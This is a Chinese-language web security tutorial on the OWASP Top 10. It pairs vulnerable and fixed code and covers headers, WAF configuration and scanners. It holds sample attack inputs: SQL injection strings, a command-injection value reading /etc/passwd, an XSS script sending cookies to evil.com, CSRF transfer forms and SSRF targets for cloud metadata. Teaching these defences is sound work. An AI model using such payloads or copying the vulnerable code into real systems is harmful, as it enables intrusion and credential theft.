网络安全从基础到实战 第6篇:Web安全与OWASP Top 10
Network Security Series Part 6: Web Security and OWASP Top 10
前言:Web应用安全的重要性
现代企业的大部分业务都通过Web应用运营。从在线购物、金融服务、社交媒体到企业内部系统,基于Web的服务已成为核心基础设施。因此,Web应用成为攻击者的主要目标,Web安全也成为企业安全的最前线。
OWASP(开放Web应用安全项目)是Web应用安全领域最权威的非营利组织,定期发布最严重的Web安全风险列表"OWASP Top 10"。本文将基于OWASP Top 10 2021详细介绍主要Web漏洞及防御方法。
1. OWASP Top 10 2021概述
OWASP Top 10 2021是最新版本,与之前版本(2017)相比有了重大变化。
| 排名 | 漏洞 | 说明 |
|---|---|---|
| A01 | Broken Access Control | 访问控制失效 |
| A02 | Cryptographic Failures | 加密失败 |
| A03 | Injection | 注入攻击 |
| A04 | Insecure Design | 不安全的设计 |
| A05 | Security Misconfiguration | 安全配置错误 |
| A06 | Vulnerable and Outdated Components | 易受攻击的组件 |
| A07 | Identification and Authentication Failures | 认证失败 |
| A08 | Software and Data Integrity Failures | 软件完整性失败 |
| A09 | Security Logging and Monitoring Failures | 日志和监控失败 |
| A10 | Server-Side Request Forgery (SSRF) | 服务器端请求伪造 |
2. A01: Broken Access Control(访问控制失效)
访问控制失效在2021年Top 10中排名第一。当用户能够执行超出其权限的操作时就会发生。
2.1 漏洞类型
- 垂直权限提升:普通用户访问管理员功能
- 水平权限提升:访问其他用户的数据
- IDOR(不安全的直接对象引用):通过URL参数操纵访问其他用户数据
- 路径遍历:通过目录遍历访问文件
2.2 存在漏洞的代码示例
# 存在漏洞的代码 - IDOR漏洞
@app.route('/api/user/<user_id>/profile')
def get_user_profile(user_id):
# 没有检查是否是当前登录用户
user = User.query.get(user_id)
return jsonify(user.to_dict())
# 存在漏洞的代码 - 管理员功能无访问控制
@app.route('/admin/delete_user/<user_id>')
def delete_user(user_id):
User.query.filter_by(id=user_id).delete()
return "User deleted"
2.3 安全的代码示例
# 安全的代码 - IDOR防御
@app.route('/api/user/<user_id>/profile')
@login_required
def get_user_profile(user_id):
# 只有当前登录用户才能访问自己的资料
if current_user.id != int(user_id):
abort(403) # Forbidden
user = User.query.get(user_id)
return jsonify(user.to_dict())
# 安全的代码 - 基于角色的访问控制
@app.route('/admin/delete_user/<user_id>')
@login_required
@admin_required # 使用装饰器检查管理员权限
def delete_user(user_id):
if not current_user.is_admin:
abort(403)
User.query.filter_by(id=user_id).delete()
return "User deleted"
3. A03: Injection(注入攻击)
注入攻击发生在不可信的数据作为命令或查询的一部分发送时。SQL注入是最典型的例子。
3.1 SQL注入攻击类型
- 经典SQL注入:通过错误消息提取信息
- 盲SQL注入:通过真/假响应提取信息
- 基于时间的盲SQL注入:通过响应时间差提取信息
- 基于Union的SQL注入:使用UNION子句提取数据
3.2 SQL注入攻击示例
-- 存在漏洞的登录查询
SELECT * FROM users WHERE username = 'admin' AND password = 'password'
-- 攻击者输入: username = admin'--
SELECT * FROM users WHERE username = 'admin'--' AND password = 'anything'
-- 结果: 绕过密码验证
-- 基于Union的攻击
SELECT name, description FROM products WHERE id = 1 UNION SELECT username, password FROM users--
-- 基于时间的盲SQL注入
SELECT * FROM users WHERE id = 1; IF (1=1) WAITFOR DELAY '0:0:5'--
3.3 SQL注入防御
# 存在漏洞的代码
def get_user(username):
query = f"SELECT * FROM users WHERE username = '{username}'"
cursor.execute(query)
return cursor.fetchone()
# 安全的代码 - 预处理语句(参数化查询)
def get_user(username):
query = "SELECT * FROM users WHERE username = %s"
cursor.execute(query, (username,))
return cursor.fetchone()
# 使用ORM(SQLAlchemy)
def get_user(username):
return User.query.filter_by(username=username).first()
// Java - 使用PreparedStatement
String query = "SELECT * FROM users WHERE username = ? AND password = ?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setString(1, username);
pstmt.setString(2, password);
ResultSet rs = pstmt.executeQuery();
3.4 其他注入攻击
# 命令注入漏洞
import os
def ping_host(host):
os.system(f"ping -c 4 {host}") # 存在漏洞!
# 攻击: host = "8.8.8.8; cat /etc/passwd"
# 安全的代码
import subprocess
def ping_host(host):
# 输入验证
if not re.match(r'^[\d.]+$', host):
raise ValueError("Invalid host")
subprocess.run(['ping', '-c', '4', host], capture_output=True)
4. A07: Identification and Authentication Failures
认证相关漏洞涉及会话管理、密码策略、多因素认证等多个领域。
4.1 漏洞类型
- 允许弱密码
- 对凭证填充攻击脆弱
- 会话固定(Session Fixation)
- 会话ID在URL中暴露
- 不安全的密码恢复
4.2 安全的认证实现
from flask import Flask, session
from werkzeug.security import generate_password_hash, check_password_hash
import secrets
app = Flask(__name__)
app.config['SECRET_KEY'] = secrets.token_hex(32)
app.config['SESSION_COOKIE_SECURE'] = True
app.config['SESSION_COOKIE_HTTPONLY'] = True
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'
# 密码哈希
def create_user(username, password):
# 密码复杂度验证
if len(password) < 12:
raise ValueError("Password too short")
if not re.search(r'[A-Z]', password):
raise ValueError("Password needs uppercase")
if not re.search(r'[a-z]', password):
raise ValueError("Password needs lowercase")
if not re.search(r'\d', password):
raise ValueError("Password needs digit")
hashed = generate_password_hash(password, method='pbkdf2:sha256:310000')
# 或使用bcrypt、argon2
User.create(username=username, password_hash=hashed)
# 登录尝试限制
from flask_limiter import Limiter
limiter = Limiter(app)
@app.route('/login', methods=['POST'])
@limiter.limit("5 per minute") # 每分钟5次限制
def login():
username = request.form['username']
password = request.form['password']
user = User.query.filter_by(username=username).first()
if user and check_password_hash(user.password_hash, password):
session.regenerate() # 重新生成会话ID
session['user_id'] = user.id
return redirect('/dashboard')
# 失败时使用通用消息(防止信息泄露)
return "Invalid credentials", 401
5. XSS(跨站脚本)攻击与防御
XSS是攻击者在网页中注入恶意脚本,使其在其他用户的浏览器中执行的攻击。
5.1 XSS类型
- 存储型XSS:恶意脚本存储在服务器上,传递给其他用户
- 反射型XSS:恶意脚本通过URL反射执行
- DOM型XSS:在客户端JavaScript中发生
5.2 XSS攻击示例
<!-- 存储型XSS: 论坛评论 -->
<script>document.location='http://evil.com/steal?cookie='+document.cookie</script>
<!-- 反射型XSS: 搜索结果页面 -->
https://example.com/search?q=<script>alert('XSS')</script>
<!-- 各种XSS载荷 -->
<img src=x onerror="alert('XSS')">
<svg onload="alert('XSS')">
<body onload="alert('XSS')">
<iframe src="javascript:alert('XSS')">
5.3 XSS防御
# Python Flask - 自动转义(Jinja2)
from markupsafe import escape
@app.route('/search')
def search():
query = request.args.get('q', '')
# 模板中自动转义
return render_template('search.html', query=query)
# 需要手动转义时
safe_input = escape(user_input)
// JavaScript中安全的DOM操作
// 存在漏洞的代码
element.innerHTML = userInput;
// 安全的代码
element.textContent = userInput;
// 或使用DOMPurify库
const clean = DOMPurify.sanitize(userInput);
element.innerHTML = clean;
5.4 内容安全策略(CSP)
# 在Nginx中设置CSP头
add_header Content-Security-Policy "
default-src 'self';
script-src 'self' 'nonce-randomvalue' https://trusted-cdn.com;
style-src 'self' 'unsafe-inline';
img-src 'self' data: https:;
font-src 'self' https://fonts.googleapis.com;
connect-src 'self' https://api.example.com;
frame-ancestors 'none';
base-uri 'self';
form-action 'self';
" always;
<!-- HTML中使用nonce -->
<script nonce="randomvalue">
// 只有这个脚本会执行
console.log('Allowed script');
</script>
6. CSRF(跨站请求伪造)
CSRF是利用已认证用户的权限发送攻击者想要的请求的攻击。
6.1 CSRF攻击示例
<!-- 嵌入恶意网站的CSRF攻击代码 -->
<!-- 使用图片标签的GET请求 -->
<img src="https://bank.com/transfer?to=attacker&amount=10000">
<!-- 使用表单的POST请求 -->
<form action="https://bank.com/transfer" method="POST" id="csrf-form">
<input type="hidden" name="to" value="attacker">
<input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf-form').submit();</script>
6.2 CSRF防御
# 使用Flask-WTF的CSRF令牌
from flask_wtf.csrf import CSRFProtect
app = Flask(__name__)
app.config['SECRET_KEY'] = 'your-secret-key'
csrf = CSRFProtect(app)
# 在模板中使用CSRF令牌
# <form method="post">
# {{ csrf_token() }}
# ...
# </form>
# AJAX请求时
# headers: {'X-CSRFToken': csrf_token}
// JavaScript中包含CSRF令牌
fetch('/api/transfer', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'X-CSRF-Token': document.querySelector('meta[name="csrf-token"]').content
},
body: JSON.stringify({to: 'recipient', amount: 100})
});
6.3 SameSite Cookie设置
# Flask会话Cookie设置
app.config.update(
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_HTTPONLY=True,
SESSION_COOKIE_SAMESITE='Strict' # 或 'Lax'
)
7. SSRF(服务器端请求伪造)
SSRF是使服务器向攻击者指定的URL发送请求的攻击。可被滥用于访问内部网络、窃取云元数据等。
7.1 SSRF攻击场景
# AWS元数据窃取
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# 内部服务访问
http://localhost:8080/admin
http://192.168.1.1/router-config
# 读取文件
file:///etc/passwd
7.2 SSRF防御
import ipaddress
from urllib.parse import urlparse
def is_safe_url(url):
"""SSRF防御的URL验证"""
try:
parsed = urlparse(url)
# 协议验证
if parsed.scheme not in ['http', 'https']:
return False
# IP地址验证
hostname = parsed.hostname
if hostname:
try:
ip = ipaddress.ip_address(hostname)
# 阻止私有IP、回环、链路本地
if ip.is_private or ip.is_loopback or ip.is_link_local:
return False
except ValueError:
# 是域名的情况 - 白名单验证
allowed_domains = ['api.trusted.com', 'cdn.example.com']
if hostname not in allowed_domains:
# 防止DNS重绑定,检查IP
import socket
resolved_ip = socket.gethostbyname(hostname)
ip = ipaddress.ip_address(resolved_ip)
if ip.is_private or ip.is_loopback:
return False
return True
except Exception:
return False
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')
if not is_safe_url(url):
abort(400, "Invalid URL")
response = requests.get(url, timeout=5)
return response.content
8. 安全头设置
8.1 主要安全头
# Nginx安全头设置
server {
# 启用XSS过滤器
add_header X-XSS-Protection "1; mode=block" always;
# 防止MIME嗅探
add_header X-Content-Type-Options "nosniff" always;
# 防止点击劫持
add_header X-Frame-Options "DENY" always;
# 强制HTTPS(HSTS)
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;
# Referrer策略
add_header Referrer-Policy "strict-origin-when-cross-origin" always;
# 权限策略
add_header Permissions-Policy "geolocation=(), microphone=(), camera=()" always;
# 内容安全策略
add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:; font-src 'self'; connect-src 'self'; frame-ancestors 'none';" always;
}
8.2 Apache设置
# .htaccess或httpd.conf
Header always set X-XSS-Protection "1; mode=block"
Header always set X-Content-Type-Options "nosniff"
Header always set X-Frame-Options "DENY"
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
Header always set Referrer-Policy "strict-origin-when-cross-origin"
Header always set Content-Security-Policy "default-src 'self'"
8.3 Express.js(Helmet中间件)
const express = require('express');
const helmet = require('helmet');
const app = express();
// 基本安全头设置
app.use(helmet());
// 详细设置
app.use(helmet({
contentSecurityPolicy: {
directives: {
defaultSrc: ["'self'"],
scriptSrc: ["'self'", "'unsafe-inline'"],
styleSrc: ["'self'", "'unsafe-inline'"],
imgSrc: ["'self'", "data:", "https:"],
},
},
hsts: {
maxAge: 31536000,
includeSubDomains: true,
preload: true
},
frameguard: { action: 'deny' },
noSniff: true,
xssFilter: true
}));
9. WAF(Web应用防火墙)
9.1 WAF概念
WAF是在Web应用和互联网之间过滤和监控HTTP流量的安全解决方案。它阻止SQL注入、XSS、CSRF等各种Web攻击。
WAF工作方式:
- 基于签名:匹配已知攻击模式
- 基于行为:检测异常请求模式
- 基于ML/AI:使用机器学习检测新攻击
9.2 ModSecurity设置(开源WAF)
# ModSecurity安装(Ubuntu + Nginx)
sudo apt install libmodsecurity3 libmodsecurity-dev
sudo apt install libnginx-mod-http-modsecurity
# 下载OWASP CRS(核心规则集)
cd /etc/nginx
sudo git clone https://github.com/coreruleset/coreruleset.git
cd coreruleset
sudo cp crs-setup.conf.example crs-setup.conf
# Nginx ModSecurity设置
# /etc/nginx/modsec/modsecurity.conf
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess On
SecResponseBodyMimeType text/plain text/html text/xml
SecDataDir /tmp/
SecAuditEngine RelevantOnly
SecAuditLog /var/log/nginx/modsec_audit.log
# 在Nginx服务器块中启用
server {
modsecurity on;
modsecurity_rules_file /etc/nginx/modsec/main.conf;
location / {
proxy_pass http://backend;
}
}
9.3 云WAF服务
- AWS WAF:集成到AWS环境,与CloudFront、ALB联动
- Cloudflare WAF:与CDN集成的WAF服务
- Azure WAF:与Application Gateway集成
- Google Cloud Armor:与GCP负载均衡器集成
# AWS WAF CLI创建规则示例
aws wafv2 create-web-acl \
--name "MyWebACL" \
--scope REGIONAL \
--default-action '{"Allow": {}}' \
--rules '[
{
"Name": "SQLInjectionRule",
"Priority": 1,
"Statement": {
"SqliMatchStatement": {
"FieldToMatch": {"AllQueryArguments": {}},
"TextTransformations": [{"Priority": 0, "Type": "URL_DECODE"}]
}
},
"Action": {"Block": {}},
"VisibilityConfig": {
"SampledRequestsEnabled": true,
"CloudWatchMetricsEnabled": true,
"MetricName": "SQLInjection"
}
}
]' \
--visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=MyWebACL
10. Web漏洞扫描器
10.1 OWASP ZAP(Zed Attack Proxy)
OWASP ZAP是免费的开源Web应用安全扫描器。
# 使用Docker运行OWASP ZAP
docker run -t owasp/zap2docker-stable zap-baseline.py -t https://example.com
# 通过API扫描
docker run -u zap -p 8080:8080 -d owasp/zap2docker-stable zap.sh -daemon -host 0.0.0.0 -port 8080
# 使用Python API
from zapv2 import ZAPv2
zap = ZAPv2(apikey='your-api-key', proxies={'http': 'http://localhost:8080'})
# 运行Spider
scan_id = zap.spider.scan('https://example.com')
while int(zap.spider.status(scan_id)) < 100:
time.sleep(5)
# 运行主动扫描
scan_id = zap.ascan.scan('https://example.com')
while int(zap.ascan.status(scan_id)) < 100:
time.sleep(5)
# 输出结果
print(zap.core.alerts())
10.2 Nikto
Nikto是Web服务器漏洞扫描器,检测服务器配置错误、易受攻击的文件等。
# Nikto安装和运行
sudo apt install nikto
# 基本扫描
nikto -h https://example.com
# SSL扫描
nikto -h https://example.com -ssl
# 特定端口扫描
nikto -h example.com -p 8080
# 将结果保存到文件
nikto -h https://example.com -o report.html -Format html
# 调整选项(仅执行特定测试)
# 1 - 有趣的文件/CGI
# 2 - 默认文件
# 3 - 信息泄露
# 4 - 注入(XSS/脚本/HTML)
nikto -h https://example.com -Tuning 1234
10.3 Burp Suite
Burp Suite是Web应用安全测试的集成平台。
# Burp Suite代理设置(在浏览器中)
HTTP Proxy: 127.0.0.1:8080
# 主要功能:
# - Proxy: 拦截和修改HTTP/HTTPS流量
# - Spider: 网站爬虫
# - Scanner: 自动漏洞扫描(Pro版本)
# - Intruder: 自动化攻击(暴力破解等)
# - Repeater: 手动修改和重发请求
# - Decoder: 编码/解码工具
# - Comparer: 响应比较
10.4 自动化安全测试流水线
# GitHub Actions - 安全扫描工作流
name: Security Scan
on:
push:
branches: [main]
pull_request:
branches: [main]
jobs:
security-scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run OWASP ZAP Baseline Scan
uses: zaproxy/action-baseline@v0.7.0
with:
target: 'https://staging.example.com'
rules_file_name: '.zap/rules.tsv'
- name: Run Nikto Scan
run: |
docker run --rm frapsoft/nikto -h https://staging.example.com -o /dev/stdout
- name: Upload ZAP Report
uses: actions/upload-artifact@v3
with:
name: zap-report
path: report_html.html
结论
Web应用安全需要多层防御(纵深防御)策略。总结本文内容:
- OWASP Top 10:熟悉最重要的Web安全风险列表
- 输入验证:所有用户输入都潜在危险,需要彻底验证
- 输出编码:适当转义以防止XSS
- 认证/授权:强大的认证机制和细粒度的权限管理
- 安全头:利用CSP、HSTS等浏览器安全功能
- WAF:作为额外安全层阻止已知攻击模式
- 定期扫描:通过漏洞扫描器持续进行安全检查
Web安全应从开发初期阶段就开始考虑(左移安全),建议采用将安全测试集成到CI/CD流水线中的DevSecOps方法。下一篇将介绍网络监控和日志分析。